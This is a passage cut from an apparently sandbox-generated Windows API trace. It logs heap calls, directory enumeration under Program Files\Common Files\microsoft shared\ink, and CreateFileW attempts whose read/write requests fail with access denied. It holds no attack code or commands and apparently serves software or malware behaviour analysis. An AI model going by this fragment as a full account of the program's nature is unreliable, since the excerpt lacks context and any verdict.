(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0098.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0098.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0098.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0098.567] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0098.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0098.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0098.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0098.567] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78010 [0098.568] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0554b83, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.568] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e316e09, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e316e09, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e316e09, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0098.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.569] AreFileApisANSI () returned 1 [0098.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0098.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0098.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0098.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.569] AreFileApisANSI () returned 1 [0098.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85bc0 [0098.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85bc0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 73 [0098.569] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0098.569] GetFileType (hFile=0x368) returned 0x1 [0098.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85bc0 | out: hHeap=0x20000) returned 1 [0098.569] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.570] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.570] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.570] CloseHandle (hObject=0x368) returned 1 [0098.570] AreFileApisANSI () returned 1 [0098.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x858a0 [0098.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 73 [0098.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.570] GetLastError () returned 0x5 [0098.570] GetLastError () returned 0x5 [0098.570] SetLastError (dwErrCode=0x5) [0098.570] GetLastError () returned 0x5 [0098.570] SetLastError (dwErrCode=0x5) [0098.570] GetLastError () returned 0x5 [0098.570] SetLastError (dwErrCode=0x5) [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0098.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.571] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c9a0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧☀")) returned 0 [0098.571] FindClose (in: hFindFile=0x78010 | out: hFindFile=0x78010) returned 1 [0098.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0098.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0098.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0098.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0098.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0098.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0098.572] AreFileApisANSI () returned 1 [0098.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK", lpUsedDefaultChar=0x0) returned 57 [0098.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0098.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0098.572] AreFileApisANSI () returned 1 [0098.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a430 [0098.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK") returned 57 [0098.572] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.572] GetLastError () returned 0x5 [0098.572] GetLastError () returned 0x5 [0098.572] SetLastError (dwErrCode=0x5) [0098.572] GetLastError () returned 0x5 [0098.572] SetLastError (dwErrCode=0x5) [0098.572] GetLastError () returned 0x5 [0098.572] SetLastError (dwErrCode=0x5) [0098.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0098.573] AreFileApisANSI () returned 1 [0098.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0098.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0098.573] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK") returned 57 [0098.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.573] GetLastError () returned 0x5 [0098.573] GetLastError () returned 0x5 [0098.573] SetLastError (dwErrCode=0x5) [0098.573] GetLastError () returned 0x5 [0098.573] SetLastError (dwErrCode=0x5) [0098.573] GetLastError () returned 0x5 [0098.573] SetLastError (dwErrCode=0x5) [0098.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0098.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0098.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0098.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0098.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0098.573] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0555b2c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0098.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0098.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0098.574] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x781d0 [0098.574] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0098.574] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2f0ba2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2f0ba2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2f0ba2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0098.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0098.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0098.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0098.575] HeapFree (in: hHeap=0x20000, 